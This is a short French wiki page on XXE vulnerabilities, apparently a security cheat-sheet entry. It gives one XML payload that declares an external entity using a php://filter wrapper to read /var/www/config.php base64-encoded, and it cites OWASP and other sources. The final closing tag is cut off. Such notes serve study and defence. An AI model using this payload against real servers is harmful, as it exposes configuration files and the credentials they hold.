« 1.9 Failles XXE » : différence entre les versions

De UnixWiki
Aller à la navigation Aller à la recherche
Aucun résumé des modifications
 
(Aucune différence)

Dernière version du 21 octobre 2014 à 16:32

Lire du code PHP avec une faille XXE

 <?xml version="1.0"?>
 <!DOCTYPE results [
   <!ENTITY harmless SYSTEM
   "php://filter/read=convert.base64-encode/resource=/var/www/config.php"
   >
 ]>
 <results>
   <result>&harmless;</result>
 </results

OWASP
h3stream
phpsecurity